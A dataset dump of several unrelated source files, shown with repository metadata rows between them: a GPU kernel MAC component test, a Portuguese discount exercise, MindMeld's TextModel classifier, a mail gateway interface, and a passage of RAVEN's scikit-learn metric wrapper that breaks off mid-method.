#navi = MockWriter(asmCaps = {'v_fma_f16': True,
# 'v_pk_fma_f16': False},
# kernel = {"ProblemType": {"DataType": DataType(DataType.half),
# "HighPrecisionAccumulate": False},
# "AggressivePerfMode": True,
# "ThreadTile0": 4,
# "ThreadTile1": 4},
# endLine = '\n')
def test_find(navi10, f16):
writer = MockWriter(**navi10, **f16)
found = Component.MAC.find(writer)
assert isinstance(found, Components.MAC_F16.FMA_F16_NonPacked)
def test_find2(vega10, f16_hpa):
writer = MockWriter(**vega10, **f16_hpa)
found = Component.MAC.find(writer)
assert isinstance(found, Components.MAC_F16_HPA.FMA_F16_HPA_MAD_MIX)
def test_MAC_F16_FMA_NonPacked(navi10, f16):
writer = MockWriter(**navi10, **f16)
found = Component.MAC.find(writer)
kernelText = found(writer, 2, 4)
print(kernelText)
def test_componentPath():
assert Components.MAC_F16.FMA_F16_NonPacked.componentPath() == ["Component", "MAC", "FMA_F16_NonPacked"]
def test_find_macs(useGlobalParameters, f16, f16_hpa, f16_hpa_ldl):
with useGlobalParameters() as globals:
for dtype in [f16, f16_hpa, f16_hpa_ldl]:
for arch in globals["SupportedISA"]:
writer = MockWriter(asmCaps=globals["AsmCaps"][arch], archCaps=globals["ArchCaps"][arch], **dtype)
found = Component.MAC.find(writer, True)
# No HPA on 803, every other combination should work though.
if arch != (8,0,3) or (dtype != f16_hpa and dtype != f16_hpa_ldl):
assert isinstance(found, Component.MAC)
print(dtype, arch, found)
| 36.46114 | 114 | 0.554356 | true | true | |
f7fa41af81c49e6f6e970ef316571ea89fcdd869 | 240 | py | Python | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | pacote-download/d012 - valor do produto de dar 5% desconto.py | Carlos-DOliveira/cursoemvideo-python3 | 4546c8a7360155243e2f7ecbbb80c57868f770a2 | [
"MIT"
] | null | null | null | ''' 012 Faça um algoritmo que leia o preço de um produto e mostre seu novo preço, com 5% de desconto'''
valor = float(input('Digite o valor do protudo: R$ '))
print(f'O Valor do produto com 5% de desconto é {valor - (valor * 5)/100:.2f}') | 48 | 103 | 0.683333 |
valor = float(input('Digite o valor do protudo: R$ '))
print(f'O Valor do produto com 5% de desconto é {valor - (valor * 5)/100:.2f}') | true | true |
f7fa43056e7a13c78632ab592112a94dfe59e9d5 | 17,688 | py | Python | mindmeld/models/text_models.py | BuildJet/mindmeld | 615e40288695990188adb15b9952484a967e94a8 | [
"Apache-2.0"
] | null | null | null | mindmeld/models/text_models.py | BuildJet/mindmeld | 615e40288695990188adb15b9952484a967e94a8 | [
"Apache-2.0"
] | 1 | 2021-03-16T12:47:59.000Z | 2021-03-16T12:47:59.000Z | mindmeld/models/text_models.py | isabella232/mindmeld | 82b063b21d6012b36ba2a4321edfa56b8c4b8c90 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module contains all code required to perform multinomial classification
of text.
"""
import logging
import operator
import random
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectFromModel, SelectPercentile
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
from sklearn.preprocessing import MaxAbsScaler, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from .helpers import (
CHAR_NGRAM_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
register_model,
)
from .model import EvaluatedExample, Model, StandardModelEvaluation
_NEG_INF = -1e10
# classifier types
LOG_REG_TYPE = "logreg"
DECISION_TREE_TYPE = "dtree"
RANDOM_FOREST_TYPE = "rforest"
SVM_TYPE = "svm"
SUPER_LEARNER_TYPE = "super-learner"
BASE_MODEL_TYPES = [LOG_REG_TYPE, DECISION_TREE_TYPE, RANDOM_FOREST_TYPE, SVM_TYPE]
# default model scoring type
ACCURACY_SCORING = "accuracy"
logger = logging.getLogger(__name__)
class TextModel(Model):
def __init__(self, config):
super().__init__(config)
self._class_encoder = SKLabelEncoder()
self._feat_vectorizer = DictVectorizer()
self._feat_selector = self._get_feature_selector()
self._feat_scaler = self._get_feature_scaler()
self._meta_type = None
self._meta_feat_vectorizer = DictVectorizer(sparse=False)
self._base_clfs = {}
self.cv_loss_ = None
self.train_acc_ = None
def __getstate__(self):
"""Returns the information needed pickle an instance of this class.
By default, pickling removes attributes with names starting with
underscores. This overrides that behavior.
"""
attributes = self.__dict__.copy()
attributes["_resources"] = {
rname: self._resources.get(rname, {})
for rname in [
WORD_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
CHAR_NGRAM_FREQ_RSC,
]
}
return attributes
def _get_model_constructor(self):
"""Returns the class of the actual underlying model"""
classifier_type = self.config.model_settings["classifier_type"]
try:
return {
LOG_REG_TYPE: LogisticRegression,
DECISION_TREE_TYPE: DecisionTreeClassifier,
RANDOM_FOREST_TYPE: RandomForestClassifier,
SVM_TYPE: SVC,
}[classifier_type]
except KeyError as e:
msg = "{}: Classifier type {!r} not recognized"
raise ValueError(msg.format(self.__class__.__name__, classifier_type)) from e
def _get_cv_scorer(self, selection_settings):
"""
Returns the scorer to use based on the selection settings and classifier type,
defaulting to accuracy.
"""
return selection_settings.get("scoring", ACCURACY_SCORING)
def evaluate(self, examples, labels):
"""Evaluates a model against the given examples and labels
Args:
examples: A list of examples to predict
labels: A list of expected labels
Returns:
ModelEvaluation: an object containing information about the \
evaluation
"""
# TODO: also expose feature weights?
predictions = self.predict_proba(examples)
# Create a model config object for the current effective config (after param selection)
config = self._get_effective_config()
evaluations = [
EvaluatedExample(
e, labels[i], predictions[i][0], predictions[i][1], config.label_type
)
for i, e in enumerate(examples)
]
model_eval = StandardModelEvaluation(config, evaluations)
return model_eval
def fit(self, examples, labels, params=None):
"""Trains this model.
This method inspects instance attributes to determine the classifier
object and cross-validation strategy, and then fits the model to the
training examples passed in.
Args:
examples (list): A list of examples.
labels (list): A parallel list to examples. The gold labels
for each example.
params (dict, optional): Parameters to use when training. Parameter
selection will be bypassed if this is provided
Returns:
(TextModel): Returns self to match classifier scikit-learn \
interfaces.
"""
params = params or self.config.params
skip_param_selection = params is not None or self.config.param_selection is None
# Shuffle to prevent order effects
indices = list(range(len(labels)))
random.shuffle(indices)
examples = [examples[i] for i in indices]
labels = [labels[i] for i in indices]
distinct_labels = set(labels)
if len(set(distinct_labels)) <= 1:
return self
# Extract features and classes
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
if skip_param_selection:
self._clf = self._fit(X, y, params)
self._current_params = params
else:
# run cross validation to select params
best_clf, best_params = self._fit_cv(X, y, groups)
self._clf = best_clf
self._current_params = best_params
return self
def select_params(self, examples, labels, selection_settings=None):
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
clf, params = self._fit_cv(X, y, groups, selection_settings)
self._clf = clf
return params
def _fit(self, examples, labels, params=None):
"""Trains a classifier without cross-validation.
Args:
examples (numpy.matrix): The feature matrix for a dataset.
labels (numpy.array): The target output values.
params (dict): Parameters of the classifier
"""
params = self._convert_params(params, labels, is_grid=False)
model_class = self._get_model_constructor()
params = self._clean_params(model_class, params)
return model_class(**params).fit(examples, labels)
def predict(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
y = self._clf.predict(X)
predictions = self._class_encoder.inverse_transform(y)
return self._label_encoder.decode(predictions)
def predict_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
return self._predict_proba(X, self._clf.predict_proba)
def predict_log_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
predictions = self._predict_proba(X, self._clf.predict_log_proba)
# JSON can't reliably encode infinity, so replace it with large number
for row in predictions:
_, probas = row
for label, proba in probas.items():
if proba == -np.Infinity:
probas[label] = _NEG_INF
return predictions
def view_extracted_features(self, example, dynamic_resource=None):
return self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
def _get_feature_weight(self, feat_name, label_class):
"""Retrieves the feature weight from the coefficient matrix. If there are only two
classes, the feature vector is actually collapsed into one so we need some logic to
handle that case.
Args:
feat_name (str) : The feature name
label_class (int): The index of the label
Returns:
(ndarray float): The ndarray with a single float element
"""
if len(self._class_encoder.classes_) == 2 and label_class >= 1:
return np.array([0.0])
else:
return self._clf.coef_[
label_class, self._feat_vectorizer.vocabulary_[feat_name]
]
def inspect(self, example, gold_label=None, dynamic_resource=None):
"""This class takes an example and returns a 2D list for every feature with feature
name, feature value, feature weight and their product for the predicted label. If gold
label is passed in, we will also include the feature value and weight for the gold
label and returns the log probability of the difference.
Args:
example (Query): The query to be predicted
gold_label (str): The gold label for this string
dynamic_resource (dict, optional): A dynamic resource to aid NLP inference
Returns:
(list of lists): A 2D array that includes every feature, their value, weight and \
probability
"""
if not isinstance(self._clf, LogisticRegression):
logging.warning(
"Currently inspection is only available for Logistic Regression Model"
)
return []
try:
gold_class = self._class_encoder.transform([gold_label])
except ValueError:
logger.warning("Unable to decode label `%s`", gold_label)
gold_class = None
pred_label = self.predict([example], dynamic_resource=dynamic_resource)[0]
pred_class = self._class_encoder.transform([pred_label])
features = self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
logging.info("Predicted: %s.", pred_label)
if gold_class is None:
columns = ["Feature", "Value", "Pred_W({0})".format(pred_label), "Pred_P"]
else:
columns = [
"Feature",
"Value",
"Pred_W({0})".format(pred_label),
"Pred_P",
"Gold_W({0})".format(gold_label),
"Gold_P",
"Diff",
]
logging.info("Gold: %s.", gold_label)
inspect_table = [columns]
# Get all active features sorted alphabetically by name
features = sorted(features.items(), key=operator.itemgetter(0))
for feature in features:
feat_name = feature[0]
feat_value = feature[1]
# Features we haven't seen before won't be in our vectorizer
# e.g., an exact match feature for a query we've never seen before
if feat_name not in self._feat_vectorizer.vocabulary_:
continue
weight = self._get_feature_weight(feat_name, pred_class)
product = feat_value * weight
if gold_class is None:
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
"-",
"-",
"-",
]
else:
gold_w = self._get_feature_weight(feat_name, gold_class)
gold_p = feat_value * gold_w
diff = gold_p - product
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
gold_w.round(4),
gold_p.round(4),
diff.round(4),
]
inspect_table.append(row)
return inspect_table
def _predict_proba(self, X, predictor):
predictions = []
for row in predictor(X):
probabilities = {}
top_class = None
for class_index, proba in enumerate(row):
raw_class = self._class_encoder.inverse_transform([class_index])[0]
decoded_class = self._label_encoder.decode([raw_class])[0]
probabilities[decoded_class] = proba
if proba > probabilities.get(top_class, -1.0):
top_class = decoded_class
predictions.append((top_class, probabilities))
return predictions
def get_feature_matrix(self, examples, y=None, fit=False, dynamic_resource=None):
"""Transforms a list of examples into a feature matrix.
Args:
examples (list): The examples.
Returns:
(tuple): tuple containing:
* (numpy.matrix): The feature matrix.
* (numpy.array): The group labels for examples.
"""
groups = []
feats = []
for idx, example in enumerate(examples):
feats.append(
self._extract_features(example, dynamic_resource, self.tokenizer)
)
groups.append(idx)
X, y = self._preprocess_data(feats, y, fit=fit)
return X, y, groups
def _preprocess_data(self, X, y=None, fit=False):
if fit:
y = self._class_encoder.fit_transform(y)
X = self._feat_vectorizer.fit_transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.fit_transform(X)
if self._feat_selector is not None:
X = self._feat_selector.fit_transform(X, y)
else:
X = self._feat_vectorizer.transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.transform(X)
if self._feat_selector is not None:
X = self._feat_selector.transform(X)
return X, y
def _convert_params(self, param_grid, y, is_grid=True):
"""
Convert the params from the style given by the config to the style
passed in to the actual classifier.
Args:
param_grid (dict): lists of classifier parameter values, keyed by parameter name
Returns:
(dict): revised param_grid
"""
if "class_weight" in param_grid:
raw_weights = (
param_grid["class_weight"] if is_grid else [param_grid["class_weight"]]
)
weights = [
{
k
if isinstance(k, int)
else self._class_encoder.transform((k,))[0]: v
for k, v in cw_dict.items()
}
for cw_dict in raw_weights
]
param_grid["class_weight"] = weights if is_grid else weights[0]
elif "class_bias" in param_grid:
# interpolate between class_bias=0 => class_weight=None
# and class_bias=1 => class_weight='balanced'
class_count = np.bincount(y)
classes = self._class_encoder.classes_
weights = []
raw_bias = (
param_grid["class_bias"] if is_grid else [param_grid["class_bias"]]
)
for class_bias in raw_bias:
# these weights are same as sklearn's class_weight='balanced'
balanced_w = [(len(y) / len(classes) / c) for c in class_count]
balanced_tuples = list(zip(list(range(len(classes))), balanced_w))
weights.append(
{c: (1 - class_bias) + class_bias * w for c, w in balanced_tuples}
)
param_grid["class_weight"] = weights if is_grid else weights[0]
del param_grid["class_bias"]
return param_grid
def _get_feature_selector(self):
"""Get a feature selector instance based on the feature_selector model
parameter
Returns:
(Object): a feature selector which returns a reduced feature matrix, \
given the full feature matrix, X and the class labels, y
"""
if self.config.model_settings is None:
selector_type = None
else:
selector_type = self.config.model_settings.get("feature_selector")
selector = {
"l1": SelectFromModel(LogisticRegression(penalty="l1", C=1)),
"f": SelectPercentile(),
}.get(selector_type)
return selector
def _get_feature_scaler(self):
"""Get a feature value scaler based on the model settings"""
if self.config.model_settings is None:
scale_type = None
else:
scale_type = self.config.model_settings.get("feature_scaler")
scaler = {
"std-dev": StandardScaler(with_mean=False),
"max-abs": MaxAbsScaler(),
}.get(scale_type)
return scaler
register_model("text", TextModel)
| 37.004184 | 96 | 0.609 |
import logging
import operator
import random
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectFromModel, SelectPercentile
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import LabelEncoder as SKLabelEncoder
from sklearn.preprocessing import MaxAbsScaler, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
from .helpers import (
CHAR_NGRAM_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
register_model,
)
from .model import EvaluatedExample, Model, StandardModelEvaluation
_NEG_INF = -1e10
LOG_REG_TYPE = "logreg"
DECISION_TREE_TYPE = "dtree"
RANDOM_FOREST_TYPE = "rforest"
SVM_TYPE = "svm"
SUPER_LEARNER_TYPE = "super-learner"
BASE_MODEL_TYPES = [LOG_REG_TYPE, DECISION_TREE_TYPE, RANDOM_FOREST_TYPE, SVM_TYPE]
ACCURACY_SCORING = "accuracy"
logger = logging.getLogger(__name__)
class TextModel(Model):
def __init__(self, config):
super().__init__(config)
self._class_encoder = SKLabelEncoder()
self._feat_vectorizer = DictVectorizer()
self._feat_selector = self._get_feature_selector()
self._feat_scaler = self._get_feature_scaler()
self._meta_type = None
self._meta_feat_vectorizer = DictVectorizer(sparse=False)
self._base_clfs = {}
self.cv_loss_ = None
self.train_acc_ = None
def __getstate__(self):
attributes = self.__dict__.copy()
attributes["_resources"] = {
rname: self._resources.get(rname, {})
for rname in [
WORD_FREQ_RSC,
QUERY_FREQ_RSC,
WORD_NGRAM_FREQ_RSC,
CHAR_NGRAM_FREQ_RSC,
]
}
return attributes
def _get_model_constructor(self):
classifier_type = self.config.model_settings["classifier_type"]
try:
return {
LOG_REG_TYPE: LogisticRegression,
DECISION_TREE_TYPE: DecisionTreeClassifier,
RANDOM_FOREST_TYPE: RandomForestClassifier,
SVM_TYPE: SVC,
}[classifier_type]
except KeyError as e:
msg = "{}: Classifier type {!r} not recognized"
raise ValueError(msg.format(self.__class__.__name__, classifier_type)) from e
def _get_cv_scorer(self, selection_settings):
return selection_settings.get("scoring", ACCURACY_SCORING)
def evaluate(self, examples, labels):
predictions = self.predict_proba(examples)
config = self._get_effective_config()
evaluations = [
EvaluatedExample(
e, labels[i], predictions[i][0], predictions[i][1], config.label_type
)
for i, e in enumerate(examples)
]
model_eval = StandardModelEvaluation(config, evaluations)
return model_eval
def fit(self, examples, labels, params=None):
params = params or self.config.params
skip_param_selection = params is not None or self.config.param_selection is None
indices = list(range(len(labels)))
random.shuffle(indices)
examples = [examples[i] for i in indices]
labels = [labels[i] for i in indices]
distinct_labels = set(labels)
if len(set(distinct_labels)) <= 1:
return self
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
if skip_param_selection:
self._clf = self._fit(X, y, params)
self._current_params = params
else:
best_clf, best_params = self._fit_cv(X, y, groups)
self._clf = best_clf
self._current_params = best_params
return self
def select_params(self, examples, labels, selection_settings=None):
y = self._label_encoder.encode(labels)
X, y, groups = self.get_feature_matrix(examples, y, fit=True)
clf, params = self._fit_cv(X, y, groups, selection_settings)
self._clf = clf
return params
def _fit(self, examples, labels, params=None):
params = self._convert_params(params, labels, is_grid=False)
model_class = self._get_model_constructor()
params = self._clean_params(model_class, params)
return model_class(**params).fit(examples, labels)
def predict(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
y = self._clf.predict(X)
predictions = self._class_encoder.inverse_transform(y)
return self._label_encoder.decode(predictions)
def predict_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
return self._predict_proba(X, self._clf.predict_proba)
def predict_log_proba(self, examples, dynamic_resource=None):
X, _, _ = self.get_feature_matrix(examples, dynamic_resource=dynamic_resource)
predictions = self._predict_proba(X, self._clf.predict_log_proba)
for row in predictions:
_, probas = row
for label, proba in probas.items():
if proba == -np.Infinity:
probas[label] = _NEG_INF
return predictions
def view_extracted_features(self, example, dynamic_resource=None):
return self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
def _get_feature_weight(self, feat_name, label_class):
if len(self._class_encoder.classes_) == 2 and label_class >= 1:
return np.array([0.0])
else:
return self._clf.coef_[
label_class, self._feat_vectorizer.vocabulary_[feat_name]
]
def inspect(self, example, gold_label=None, dynamic_resource=None):
if not isinstance(self._clf, LogisticRegression):
logging.warning(
"Currently inspection is only available for Logistic Regression Model"
)
return []
try:
gold_class = self._class_encoder.transform([gold_label])
except ValueError:
logger.warning("Unable to decode label `%s`", gold_label)
gold_class = None
pred_label = self.predict([example], dynamic_resource=dynamic_resource)[0]
pred_class = self._class_encoder.transform([pred_label])
features = self._extract_features(
example, dynamic_resource=dynamic_resource, tokenizer=self.tokenizer
)
logging.info("Predicted: %s.", pred_label)
if gold_class is None:
columns = ["Feature", "Value", "Pred_W({0})".format(pred_label), "Pred_P"]
else:
columns = [
"Feature",
"Value",
"Pred_W({0})".format(pred_label),
"Pred_P",
"Gold_W({0})".format(gold_label),
"Gold_P",
"Diff",
]
logging.info("Gold: %s.", gold_label)
inspect_table = [columns]
# Get all active features sorted alphabetically by name
features = sorted(features.items(), key=operator.itemgetter(0))
for feature in features:
feat_name = feature[0]
feat_value = feature[1]
# Features we haven't seen before won't be in our vectorizer
# e.g., an exact match feature for a query we've never seen before
if feat_name not in self._feat_vectorizer.vocabulary_:
continue
weight = self._get_feature_weight(feat_name, pred_class)
product = feat_value * weight
if gold_class is None:
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
"-",
"-",
"-",
]
else:
gold_w = self._get_feature_weight(feat_name, gold_class)
gold_p = feat_value * gold_w
diff = gold_p - product
row = [
feat_name,
round(feat_value, 4),
weight.round(4),
product.round(4),
gold_w.round(4),
gold_p.round(4),
diff.round(4),
]
inspect_table.append(row)
return inspect_table
def _predict_proba(self, X, predictor):
predictions = []
for row in predictor(X):
probabilities = {}
top_class = None
for class_index, proba in enumerate(row):
raw_class = self._class_encoder.inverse_transform([class_index])[0]
decoded_class = self._label_encoder.decode([raw_class])[0]
probabilities[decoded_class] = proba
if proba > probabilities.get(top_class, -1.0):
top_class = decoded_class
predictions.append((top_class, probabilities))
return predictions
def get_feature_matrix(self, examples, y=None, fit=False, dynamic_resource=None):
groups = []
feats = []
for idx, example in enumerate(examples):
feats.append(
self._extract_features(example, dynamic_resource, self.tokenizer)
)
groups.append(idx)
X, y = self._preprocess_data(feats, y, fit=fit)
return X, y, groups
def _preprocess_data(self, X, y=None, fit=False):
if fit:
y = self._class_encoder.fit_transform(y)
X = self._feat_vectorizer.fit_transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.fit_transform(X)
if self._feat_selector is not None:
X = self._feat_selector.fit_transform(X, y)
else:
X = self._feat_vectorizer.transform(X)
if self._feat_scaler is not None:
X = self._feat_scaler.transform(X)
if self._feat_selector is not None:
X = self._feat_selector.transform(X)
return X, y
def _convert_params(self, param_grid, y, is_grid=True):
if "class_weight" in param_grid:
raw_weights = (
param_grid["class_weight"] if is_grid else [param_grid["class_weight"]]
)
weights = [
{
k
if isinstance(k, int)
else self._class_encoder.transform((k,))[0]: v
for k, v in cw_dict.items()
}
for cw_dict in raw_weights
]
param_grid["class_weight"] = weights if is_grid else weights[0]
elif "class_bias" in param_grid:
class_count = np.bincount(y)
classes = self._class_encoder.classes_
weights = []
raw_bias = (
param_grid["class_bias"] if is_grid else [param_grid["class_bias"]]
)
for class_bias in raw_bias:
balanced_w = [(len(y) / len(classes) / c) for c in class_count]
balanced_tuples = list(zip(list(range(len(classes))), balanced_w))
weights.append(
{c: (1 - class_bias) + class_bias * w for c, w in balanced_tuples}
)
param_grid["class_weight"] = weights if is_grid else weights[0]
del param_grid["class_bias"]
return param_grid
def _get_feature_selector(self):
if self.config.model_settings is None:
selector_type = None
else:
selector_type = self.config.model_settings.get("feature_selector")
selector = {
"l1": SelectFromModel(LogisticRegression(penalty="l1", C=1)),
"f": SelectPercentile(),
}.get(selector_type)
return selector
def _get_feature_scaler(self):
if self.config.model_settings is None:
scale_type = None
else:
scale_type = self.config.model_settings.get("feature_scaler")
scaler = {
"std-dev": StandardScaler(with_mean=False),
"max-abs": MaxAbsScaler(),
}.get(scale_type)
return scaler
register_model("text", TextModel)
| true | true |
f7fa44a77c0ababe4dea55be8f086fb223ae61c2 | 280 | py | Python | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | autovirt/mail/interface/mail.py | xlam/autovirt | a19f9237c8b1123ce4f4b8b396dc88122019d4f8 | [
"MIT"
] | null | null | null | import abc
from autovirt.structs import Message
class MailGateway(abc.ABC):
@abc.abstractmethod
def get_messages_by_subject(self, subject: str) -> list[Message]:
pass
@abc.abstractmethod
def delete_messages(self, messages: list[Message]):
pass
| 20 | 69 | 0.703571 | import abc
from autovirt.structs import Message
class MailGateway(abc.ABC):
@abc.abstractmethod
def get_messages_by_subject(self, subject: str) -> list[Message]:
pass
@abc.abstractmethod
def delete_messages(self, messages: list[Message]):
pass
| true | true |
f7fa451ddd286b694225e6d832e26e4b1b0e775d | 8,237 | py | Python | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | ravenframework/Metrics/metrics/SklMetric.py | khurrumsaleem/raven | 3a158f9ae3851d3eca51b4bd91ea6494e5c0ed89 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on August 20 2016
@author: mandd
"""
#External Modules------------------------------------------------------------------------------------
import numpy as np
import ast
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from ...utils import utils
from .MetricInterface import MetricInterface
from ...utils import InputData, InputTypes
#Internal Modules End--------------------------------------------------------------------------------
class SKL(MetricInterface):
"""
Scikit-learn metrics
"""
availMetrics ={}
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
inputSpecification = super().getInputSpecification()
inputSpecification.addSub(InputData.parameterInputFactory("metricType",contentType=InputTypes.StringType),quantity=InputData.Quantity.one)
inputSpecification.addSub(InputData.parameterInputFactory("sample_weight",contentType=InputTypes.FloatListType),quantity=InputData.Quantity.zero_to_one)
return inputSpecification
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
super().__init__()
if len(self.availMetrics) == 0:
import sklearn
import sklearn.metrics
# FIXME: median_absolute_error only accepts 1-D numpy array, and if we want to use this metric, it should
# be handled differently.
#from sklearn.metrics import median_absolute_error
# regression metrics
self.availMetrics['regression'] = {}
self.availMetrics['regression']['explained_variance_score'] = sklearn.metrics.explained_variance_score
self.availMetrics['regression']['mean_absolute_error'] = sklearn.metrics.mean_absolute_error
self.availMetrics['regression']['r2_score'] = sklearn.metrics.r2_score
self.availMetrics['regression']['mean_squared_error'] = sklearn.metrics.mean_squared_error
# paired distance metrics, no weights
if int(sklearn.__version__.split(".")[1]) > 17:
self.availMetrics['paired_distance'] = {}
self.availMetrics['paired_distance']['euclidean'] = sklearn.metrics.pairwise.paired_euclidean_distances
self.availMetrics['paired_distance']['manhattan'] = sklearn.metrics.pairwise.paired_manhattan_distances
self.availMetrics['paired_distance']['cosine'] = sklearn.metrics.pairwise.paired_cosine_distances
# TODO: add more metrics here
# metric from scipy.spatial.distance, for example mahalanobis, minkowski
# The type of given metric, None or List of two elements, first element should be in availMetrics.keys()
# and sencond element should be in availMetrics.values()[firstElement].keys()
self.metricType = None
# True indicates the metric needs to be able to handle dynamic data
self._dynamicHandling = True
def handleInput(self, paramInput):
"""
Method that reads the portion of the xml input that belongs to this specialized class
and initializes internal parameters
@ In, paramInput, InputData.parameterInput, input specs
@ Out, None
"""
self.distParams = {}
for child in paramInput.subparts:
if child.getName() == "metricType":
self.metricType = list(elem.strip() for elem in child.value.split('|'))
if len(self.metricType) != 2:
self.raiseAnError(IOError, "Metric type: '", child.value, "' is not correct, please check the user manual for the correct metric type!")
else:
self.distParams[child.getName()] = child.value
if self.metricType[0] not in self.__class__.availMetrics.keys() or self.metricType[1] not in self.__class__.availMetrics[self.metricType[0]].keys():
self.raiseAnError(IOError, "Metric '", self.name, "' with metricType '", self.metricType[0], "|", self.metricType[1], "' is not valid!")
def run(self, x, y, weights=None, axis=0, **kwargs):
"""
This method computes difference between two points x and y based on given metric
@ In, x, numpy.ndarray, array containing data of x, if 1D array is provided,
the array will be reshaped via x.reshape(-1,1) for paired_distance, shape (n_samples, ), if 2D
array is provided, shape (n_samples, n_outputs)
@ In, y, numpy.ndarray, array containing data of y, if 1D array is provided,
the array will be reshaped via y.reshape(-1,1), shape (n_samples, ), if 2D
array is provided, shape (n_samples, n_outputs)
@ In, weights, array_like (numpy.array or list), optional, weights associated
with input, shape (n_samples) if axis = 0, otherwise shape (n_outputs)
@ In, axis, integer, optional, axis along which a metric is performed, default is 0,
i.e. the metric will performed along the first dimension (the "rows").
If metric postprocessor is used, the first dimension is the RAVEN_sample_ID,
and the second dimension is the pivotParameter if HistorySet is provided.
@ In, kwargs, dict, dictionary of parameters characteristic of each metric
@ Out, value, numpy.ndarray, metric result, shape (n_outputs) if axis = 0, otherwise
shape (n_samples), we assume the dimension of input numpy.ndarray is no more than 2.
"""
#######################################################################################
# The inputs of regression metric, i.e. x, y should have shape (n_samples, n_outputs),
# and the outputs will have the shape (n_outputs).
# However, the inputs of paired metric, i.e. x, y should convert the shape to
# (n_outputs, n_samples), and the outputs will have the shape (n_outputs).
#######################################################################################
assert(isinstance(x,np.ndarray)) # NOTE these assertions will not show up for non-debug runs!
assert(isinstance(y,np.ndarray))
assert(x.shape == y.shape), "Input data x, y should have the same shape"
if weights is not None and self.metricType[0] == 'regression' and 'sample_weight' not in self.distParams.keys():
self.distParams['sample_weight'] = weights
if self.metricType[0] == 'regression':
self.distParams['multioutput'] = 'raw_values'
dictTemp = utils.mergeDictionaries(kwargs,self.distParams)
if self.metricType[0] == 'paired_distance':
if len(x.shape) == 1:
x = x.reshape(-1,1)
y = y.reshape(-1,1)
else:
# Transpose is needed, since paired_distance is operated on the 'row'
x = x.T
y = y.T
if axis == 1:
x = x.T
y = y.T
# check the dimension of weights
assert(x.shape[0] == len(weights)), "'weights' should have the same length of the first dimension of input data"
elif axis != 0:
